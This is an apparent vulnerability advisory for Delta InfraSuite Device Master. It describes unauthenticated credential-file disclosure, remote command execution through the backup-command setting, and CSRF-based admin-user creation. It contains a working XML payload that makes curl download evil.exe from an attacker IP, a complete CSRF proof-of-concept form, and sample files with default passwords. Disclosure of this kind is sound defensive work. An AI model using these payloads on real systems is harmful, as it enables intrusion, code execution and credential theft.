Resources > research

RBS-2022-002 – Delta Infrasuite Device Master

A function that handles GET requests does not enforce any authentication and allows to request any file e.g. in the infrasuitemanager/ApRunning/ directory. This allows accessing the UserInfoList.xml or Gateway.xml files, which include user credentials.

Table Of Contents
Table of Contents
Vendor/Product information
Vulnerable program details
Credits
Vulnerability details
Proof of Concept
Solution
References
Timeline
More
subscribe to our newsletter

Delta Infrasuite Device Master – Multiple Vulnerabilities

Vendor / Product information

“InfraSuite Device Master provides a rich set of capabilities that simplify and automate critical device monitoring. It allows users to observe the status of all devices, query event logs or history data, and assists users in taking appropriate action. With cost effective deployment, this software solution is scalable to match your business growth.”

Source:
https://www.deltapowersolutions.com/en/mcis/data-center-infrasuite-device-master.php

Vulnerable program details

Tested products and version:

Vendor: Delta Power Solutions
Product: InfraSuite Device Master
Version: 00.00.01a

Credits

Sven Krewitt, Flashpoint

Vulnerability details

The application provides a web interface to view the status and data of monitored devices on a web page. The documentation refers to this interface as the Web Monitor. This interface is affected by the following vulnerabilities.

WebEngineHandler::WebServerCallBack() Function Missing Authentication Remote Credential Disclosure

Requests to the web interface are handled in the WebEngineHandler::WebServerCallBack() function in ControlLayer.dll. The function parses incoming requests and invokes different functions depending on the request method and path.

When handling GET requests, the function does not enforce any authentication and allows to request any file e.g. in the infrasuitemanager/ApRunning/ directory. 

This allows accessing the UserInfoList.xml or Gateway.xml files, which include user credentials.

UserInfoList.xml:

<?xml version="1.0"?>
<XMLUserInfo xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
 <userDataList>
   <XMLUserData>
     <userID>0</userID>
     <account>Administrator</account>
     <password>cGFzc3dvcmQ=</password> //base64-encoded “password”

Gateway.xml:

<?xml version="1.0"?>
<XMLControlServerData xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
 <title>Gateway_Server</title>
 <priNetSetting>
   <ipAddress />
   <portList />
 </priNetSetting>
 <secNetSetting>
   <ipAddress />
   <portList />
 </secNetSetting>
 <storageSetting>
   <dbType>Postgres</dbType>
   <dataSource>PostgreSQL35W</dataSource>
   <account>postgres</account>
   <password>Ems3000!</password>
   <period>60</period>

The disclosure of the Administrator account password grants an attacker access to the web interface.

/infrasuitemanager/runningconfigure/configgateway.xml Endpoint Remote Command Execution

An administrative user can make minor configuration changes via the /infrasuitemanager/runningconfigure/configgateway.xml endpoint. The web interface limits this to changing preferences and configuring web server ports.

However, based on the XML contents in the respective HTTP request, other configuration options can be changed as well. This allows e.g. to enable the database backup option and to change the backup command and argument to arbitrary values. An attacker can configure a backup command that downloads and executes arbitrary files with privileges of the ‘infrasuite’ user.

Decoded request payload:

xml=<CtrlLayerNWCommand_Gateway+xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"+xmlns:xsd="http://www.w3.org/2001/XMLSchema"><i16OperationUserID>0</i16OperationUserID><i32SubCommand>2</i32SubCommand><configData><sNewServerData><title>Gateway_Server</title><sPriNetSetting><ipAddress>127.0.0.1</ipAddress><portList /></sPriNetSetting><sSecNetSetting><ipAddress>127.0.0.1</ipAddress><portList /></sSecNetSetting><sStorageSetting><dbType>Postgres</dbType><dataSource>PostgreSQL35W</dataSource><account>postgres</account><password>xEms3000!</password><period>60</period><enableThresholdToSaveData>false</enableThresholdToSaveData></sStorageSetting><sWebConfig><webRoot>Web</webRoot><bEnableHTTP>true</bEnableHTTP><bEnableHTTPS>true</bEnableHTTPS><i32HTTPPort>80</i32HTTPPort><i32HTTPSPort>443</i32HTTPSPort></sWebConfig><backupInfo><BackupInfoDatabase><Enable>true</Enable><PeriodType>Daily</PeriodType><Path>C:\tmpbackup</Path><ActionTime>2022-08-15T05:52:00</ActionTime><IsNetworkDrive>false</IsNetworkDrive><NetworkDriveSetting><RemotePath /><Account /><Password /></NetworkDriveSetting><ExeCommand>C:\Windows\System32\curl.exe</ExeCommand><ExeArguments>-o+C:\evil.exe+http://192.168.50.129/evil.exe</ExeArguments></BackupInfoDatabase><BackupInfoProjectFile><Enable>false</Enable><PeriodType>Monthly</PeriodType><Path /><IsNetworkDrive>false</IsNetworkDrive><NetworkDriveSetting><RemotePath /><Account /><Password /></NetworkDriveSetting><ActionTime>2016-12-14T14:00:00-08:00</ActionTime></BackupInfoProjectFile></backupInfo></sNewServerData></configData></CtrlLayerNWCommand_Gateway>

Web Interface User Creation CSRF

The web interface is affected by a cross-site request forgery (CSRF) vulnerability as performing sensitive actions do not require multiple steps, explicit confirmation, or a unique token. By tricking a user into following a specially crafted link, an attacker can cause the victim’s browser to send a request to the web interface that creates a new administrative user.

Proof-of-concept:

<html>
 <body>
 <script>history.pushState('', '', '/')</script>
   <form action="http://192.168.50.128/infrasuitemanager/Runningconfigure/adduser.xml" method="POST">
     <input type="hidden" name="opUserID" value="0" />
     <input type="hidden" name="Account" value="test2" />
     <input type="hidden" name="Password" value="123qwe" />
     <input type="hidden" name="Name" value="" />
     <input type="hidden" name="Department" value="" />
     <input type="hidden" name="Company" value="" />
     <input type="hidden" name="Professional" value="Service" />
     <input type="hidden" name="JobNumber" value="" />
     <input type="hidden" name="HomePhone" value="" />
     <input type="hidden" name="OfficePhone" value="" />
     <input type="hidden" name="PriMobilePhone" value="" />
     <input type="hidden" name="SecMobilePhone" value="" />
     <input type="hidden" name="PriEmail" value="" />
     <input type="hidden" name="SecEmail" value="" />
     <input type="hidden" name="Remark" value="" />
     <input type="hidden" name="EnabledStatus" value="1" />
     <input type="hidden" name="DoorAccessVerifyID" value="" />
     <input type="submit" value="Submit request" />
   </form>
 </body>
</html>

Solution

Disable or restrict network access to the web interface.

References

VulnDB: 298295, 298296, 298297

Timeline

2022-07-15: Initial contact per email
2022-07-21: Contact via web form
2022-08-01: Sent reminder
2022-08-08: Sent final notice via email and web form
2022-08-15: Disclosure

Additional Resources

Vulnerability Management
Why VulnDB?
CVE fails to report over 93,000 confirmed vulnerabilities, Alarmingly, 40% of 2021 omissions were high to …
Vulnerability Management
Lineas Enables Effective Risk-Based Vulnerability Management (RBVM) with VulnDB®
VulnDB’s extensive research was the essential component that enabled Lineas to identify risk in a more …
Vulnerability Management
The Buyer’s Guide to Vulnerability Intelligence
Delve into what best-in-class data means for your organization, and vendor differentiators that will elevate your …